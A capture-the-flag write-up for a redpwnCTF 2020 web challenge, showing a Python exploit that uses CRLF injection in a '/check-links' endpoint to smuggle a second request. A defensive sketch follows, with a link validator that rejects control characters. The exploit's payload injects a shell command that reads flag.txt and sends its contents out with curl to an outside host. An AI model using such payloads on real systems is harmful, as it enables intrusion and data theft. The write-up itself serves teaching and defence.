CRLF Injection in the `/check-links` endpoint

```
import requests
from urllib.parse import urljoin, quote_plus

# Challenge instance
HOST = "http://2020.redpwnc.tf:31957/"

# The CR/LF pairs embedded in the link end the request the link checker sends
# and start a second request to the notes API; the title parameter carries the
# shell command that reads flag.txt.
link = "http://127.0.0.1\r\n\r\nGET /api/v1/notes/?title=" + quote_plus("'; curl http://justins.in/`cat flag.txt` #") + " HTTP/1.1\r\n\r\n:50596"

r = requests.post(urljoin(HOST, "/check-links"), data={
    "links": link
})
```
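
The request splitting above works only if the link checker copies the submitted link into a raw HTTP request without rejecting CR/LF. The sketch below is an added example, not code from the challenge or the original writeup: `naive_request` is a hypothetical stand-in for the server's link checker (its real implementation is not shown here), `validate_link` is one way to reject such input, and the sample link and its `/internal` path are constructed.

```python
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed sample with the same shape as the link in the script above.
SMUGGLED = "http://127.0.0.1\r\n\r\nGET /internal HTTP/1.1\r\n\r\n:8080"


def naive_request(link: str) -> bytes:
    """Hypothetical vulnerable checker: pastes the host part into raw HTTP."""
    rest = link.split("://", 1)[1]
    host = rest.rsplit(":", 1)[0]  # everything before the last ':' is "host"
    return f"GET / HTTP/1.1\r\nHost: {host}\r\n\r\n".encode()


def count_requests(raw: bytes) -> int:
    """Count the request lines a receiving HTTP server would see."""
    return sum(1 for line in raw.split(b"\r\n") if line.endswith(b" HTTP/1.1"))


def validate_link(link: str) -> str:
    """Return the link unchanged if it is safe to fetch, else raise ValueError."""
    # Check the raw string first: recent urlsplit() versions silently strip
    # CR, LF and TAB, which would hide the injection from later checks.
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in link):
        raise ValueError("control character or whitespace in link")
    parts = urlsplit(link)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        raise ValueError("unsupported scheme or missing host")
    parts.port  # raises ValueError for a non-numeric or out-of-range port
    return link


if __name__ == "__main__":
    print(count_requests(naive_request(SMUGGLED)))  # two requests on the wire
    try:
        validate_link(SMUGGLED)
    except ValueError as exc:
        print("rejected:", exc)
```

This covers only the request-splitting input; restricting which hosts the checker may reach (such as 127.0.0.1) is a separate control.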

Original writeup (https://blog.justins.in/redpwnctf-2020#web-post-it-notes).